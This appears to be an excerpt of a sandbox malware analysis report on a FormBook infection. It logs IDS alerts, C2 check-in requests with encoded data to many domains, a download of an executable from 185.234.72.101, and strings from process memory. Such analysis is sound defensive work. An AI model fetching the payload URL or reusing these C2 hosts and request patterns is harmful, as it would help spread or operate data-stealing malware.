              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49799 -> 188.114.97.3:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49800 -> 195.35.39.119:80
              Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49801 -> 188.114.97.3:80
              Source: TrafficSnort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.4:49802 -> 195.35.39.119:80
              Source: DNS query: www.lenovest.xyz
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 19 Jun 2024 20:40:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 18 Jun 2024 06:38:34 GMTETag: "a9e00-61b2454b3e108"Accept-Ranges: bytesContent-Length: 695808Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
              Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
              Source: Joe Sandbox ViewIP Address: 202.95.21.152 202.95.21.152
              Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
              Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
              Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
              Source: Joe Sandbox ViewASN Name: HP-INTERNET-ASUS HP-INTERNET-ASUS
              Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.101
              Source: global trafficHTTP traffic detected: GET /l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+QktvoJK9v8ttAQP4wg2bLqAZCOth8+1YyfQ=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.futuregainers.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /41br/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=65BU6tOk0p5LPOIJv5eZvte3ybUvohRc7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rehilNLqQM6pEfZVUJ4F0gMms0MV4xVJNebQ= HTTP/1.1Host: www.shopnow321.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /4mpz/?tF1tk6=Y+s3rA3a2LtNoPwXEph1agZvu5GuOlYPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4Voi3TiJN+9DCYn4mYX0I3YWd5veeVZiJYYCE=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.klimkina.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /0a9p/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=V8kIBUO99PR2h3hwNikpQa7QEoMXp00tAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SbRMe/fNWKGzhA25w4nUiqWWc/J5aoRnGifc= HTTP/1.1Host: www.shahaf3d.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /3h10/?tF1tk6=9mZLXJL8GvO5ODxaoOomsqt4kv5XiFfxC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtHTdpL9gTGqilltwgGUv9YmP3AeMh48KIxzc=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.againbeautywhiteskin.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /e20q/?tF1tk6=WPritX3A9R+ySLDGPku/GD0rpC4O61Hw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRL6LWdHBkCM2rbaWuRFm/Az6wkZG2Vj0/zBQ=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.lenovest.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /OdR8akYyHwr3ISR.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like GeckoHost: 185.234.72.101Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /2ha1/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=r6q+x3A/FEQLw6gnIIDKqn7cXK90QEz4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2KETivrZrq09Pe+ZYF4dhJGLDVCdvvTj0Vf0= HTTP/1.1Host: www.931951.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /egr4/?tF1tk6=OombhWzhkCuNqFAREgI5QSI/n6iJ7yj7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qC0S7x9ud02r6ucB+LtM+AWVrEw63feFc+fJU=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.srripaspocon.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /r45o/?tF1tk6=gzu5VRbRlKcxtiemuOhQ9ZWHLhmKbuZrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2onP9LYfMGpPV91FzvjCQRh4kOtmo5I82F50=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.torentreprenad.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /nce6/?QTth=cdSXMBmhjDz&gheP1DX=Ed8kY/rwObA0p5m5nhu+szHCUNlmSGCiAjj4r6cZewWhLhgYO7hQm/tRjsXvcwXKbbEnwnHnz6fwjIdmgc2mtcrqJn2XJ43mDBubdDmUHoysA9KOkH3v2hY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.ndhockeyprospects.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Source: global trafficHTTP traffic detected: GET /4iea/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=LPPTutp79E4NI/FSO4tKhhCSj88LXvNdsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp+x+MZNm8bqFqjUBXzLeJ0h1+xCuEpOdbPDQ= HTTP/1.1Host: www.grecanici.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /3in6/?gheP1DX=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&QTth=cdSXMBmhjDz HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.qmancha.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Source: global trafficHTTP traffic detected: GET /hcaw/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=Xa5/huFy8Eck4v8fb+wyxg1DlrWOKGB/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNoV7by9A8iCGRjPSG14/ArJMw+NsbE1irimM= HTTP/1.1Host: www.93v0.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /mjuo/?tF1tk6=GUK7oVIRF3FAoVitmIo24b7mQO1KNg79CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWshYAEM4vq2qW4/efVo1EPE/sR7lHPgRI0Ri4=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1Host: www.leadchanges.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global trafficHTTP traffic detected: GET /kscn/?gheP1DX=CaZls2vsCC5SEDZO9v0TsRD/xR3TWESK018fdyQAavLwN8o4xbvFproXKVSs0R5JJuiJmc+bWHrVqZCkdQKET8aXg+bTbKyQsViJTM4/a4CXWVNH2Hn1tMo=&QTth=cdSXMBmhjDz HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zonenail.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://popupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.com equals www.facebook.com (Facebook)
              Source: unknown
              HTTP traffic detected: POST /41br/ HTTP/1.1
                Host: www.shopnow321.online
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Content-Length: 203
                Origin: http://www.shopnow321.online
                Referer: http://www.shopnow321.online/41br/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 19 Jun 2024 20:39:04 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT
                Accept-Ranges: bytes
                Vary: Accept-Encoding
                Content-Encoding: gzip
                Content-Length: 836
                Content-Type: text/html
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 19 Jun 2024 20:39:06 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT
                Accept-Ranges: bytes
                Vary: Accept-Encoding
                Content-Encoding: gzip
                Content-Length: 836
                Content-Type: text/html
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 19 Jun 2024 20:39:09 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT
                Accept-Ranges: bytes
                Vary: Accept-Encoding
                Content-Encoding: gzip
                Content-Length: 836
                Content-Type: text/html
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Wed, 19 Jun 2024 20:39:12 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT
                Accept-Ranges: bytes
                Content-Length: 2361
                Vary: Accept-Encoding
                Content-Type: text/html
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx/1.18.0
                Date: Wed, 19 Jun 2024 20:39:17 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID5=fe8e078d9bbe58d91a5515d3e9c8cd8e; expires=Sat, 20-Jul-2024 20:39:17 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                Set-Cookie: dd_bdfhyr=97fbb4a1cb202a920db1824b75ad049b; expires=Thu, 20-Jun-2024 20:39:17 GMT; Max-Age=86400; path=/; secure; HttpOnly
                Server-version: 05
                Content-Encoding: gzip
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx/1.18.0
                Date: Wed, 19 Jun 2024 20:39:20 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID5=ba32b58021643d0af7ea5f5cbc056f48; expires=Sat, 20-Jul-2024 20:39:20 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                Set-Cookie: dd_bdfhyr=97fbb4a1cb202a920db1824b75ad049b; expires=Thu, 20-Jun-2024 20:39:20 GMT; Max-Age=86400; path=/; secure; HttpOnly
                Server-version: 11
                Content-Encoding: gzip
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx/1.18.0
                Date: Wed, 19 Jun 2024 20:39:23 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID5=1dc14ae36478ab420e0742cd783d1fc2; expires=Sat, 20-Jul-2024 20:39:23 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                Set-Cookie: dd_bdfhyr=97fbb4a1cb202a920db1824b75ad049b; expires=Thu, 20-Jun-2024 20:39:23 GMT; Max-Age=86400; path=/; secure; HttpOnly
                Server-version: 38
                Content-Encoding: gzip
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                x-powered-by: PHP/7.4.33
                x-litespeed-tag: afb_HTTP.404
                content-type: text/html; charset=UTF-8
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache; private
                x-litespeed-cache-control: no-cache
                transfer-encoding: chunked
                content-encoding: br
                vary: Accept-Encoding
                date: Wed, 19 Jun 2024 20:39:32 GMT
                server: LiteSpeed
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                x-powered-by: PHP/7.4.33
                x-litespeed-tag: afb_HTTP.404
                content-type: text/html; charset=UTF-8
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache; private
                x-litespeed-cache-control: no-cache
                transfer-encoding: chunked
                content-encoding: br
                vary: Accept-Encoding
                date: Wed, 19 Jun 2024 20:39:34 GMT
                server: LiteSpeed
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                x-powered-by: PHP/7.4.33
                x-litespeed-tag: afb_HTTP.404
                content-type: text/html; charset=UTF-8
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache; private
                x-litespeed-cache-control: no-cache
                transfer-encoding: chunked
                content-encoding: br
                vary: Accept-Encoding
                date: Wed, 19 Jun 2024 20:39:37 GMT
                server: LiteSpeed
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                x-powered-by: PHP/7.4.33
                content-type: text/html; charset=UTF-8
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache; private
                x-litespeed-cache-control: public,max-age=3600
                x-litespeed-tag: afb_HTTP.404,afb_404,afb_URL.bb612978f523fb6348e4e3107ed53975,afb_
                x-litespeed-cache: miss
                transfer-encoding: chunked
                date: Wed, 19 Jun 2024 20:39:39 GMT
                server: LiteSpeed
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 19 Jun 2024 20:40:08 GMT
              Server: Apache
              Content-Length: 16052
              Connection: close
              Content-Type: text/html
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 19 Jun 2024 20:40:10 GMT
              Server: Apache
              Content-Length: 16052
              Connection: close
              Content-Type: text/html
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Wed, 19 Jun 2024 20:40:13 GMT
              Server: Apache
              Content-Length: 16052
              Connection: close
              Content-Type: text/html
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Connection: close
              Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
              Pragma: no-cache
              Content-Type: text/html
              Content-Length: 1236
              Date: Wed, 19 Jun 2024 20:40:35 GMT
              Server: LiteSpeed
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Connection: close
              Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
              Pragma: no-cache
              Content-Type: text/html
              Content-Length: 1236
              Date: Wed, 19 Jun 2024 20:40:38 GMT
              Server: LiteSpeed
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Connection: close
              Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
              Pragma: no-cache
              Content-Type: text/html
              Content-Length: 1236
              Date: Wed, 19 Jun 2024 20:40:40 GMT
              Server: LiteSpeed
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Connection: close
              Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
              Pragma: no-cache
              Content-Type: text/html
              Content-Length: 1236
              Date: Wed, 19 Jun 2024 20:40:43 GMT
              Server: LiteSpeed
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx
              Date: Wed, 19 Jun 2024 20:41:10 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              X-Httpd: 1
              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
              X-Proxy-Cache-Info: DT:1
              Content-Encoding: br
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx
              Date: Wed, 19 Jun 2024 20:41:13 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              X-Httpd: 1
              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
              X-Proxy-Cache-Info: DT:1
              Content-Encoding: br
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx
              Date: Wed, 19 Jun 2024 20:41:15 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              X-Httpd: 1
              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
              X-Proxy-Cache-Info: DT:1
              Content-Encoding: br
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx
              Date: Wed, 19 Jun 2024 20:41:18 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              X-Httpd: 1
              Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
              X-Proxy-Cache: MISS
              X-Proxy-Cache-Info: 0 NC:000000 UP:
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 19 Jun 2024 20:41:32 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 19 Jun 2024 20:41:35 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 19 Jun 2024 20:41:37 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 19 Jun 2024 20:41:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 19 Jun 2024 20:41:40 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hcaw/ was not found on this server.</p></body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 19 Jun 2024 20:41:45 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 19 Jun 2024 20:41:48 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 19 Jun 2024 20:41:51 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 1 Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 19 Jun 2024 20:41:52 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 19 Jun 2024 20:41:53 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Age: 0 Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 19 Jun 2024 20:41:55 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 19 Jun 2024 20:41:57 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 19 Jun 2024 20:42:00 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: compact.exe, 00000012.00000002.4143560755.000000000263A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.234.72.101/OdR8akYyHwr3ISR.exe
              Source: compact.exe, 00000012.00000002.4143560755.000000000263A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.234.72.101/OdR8akYyHwr3ISR.exej
              Source: compact.exe, 00000012.00000002.4147635781.0000000003B1A000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003BAA000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://klimkina.pro/4mpz/?tF1tk6=Y
              Source: runonce.exe, 0000001A.00000002.4147757558.0000000005304000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000002.4145996724.0000000002F54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3807250320.00000000088A4000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://ndhockeyprospects.com/nce6/?QTth=cdSXMBmhjDz&gheP1DX=Ed8kY/rwObA0p5m5nhu
              Source: compact.exe, 00000012.00000002.4147635781.00000000042F4000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004384000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
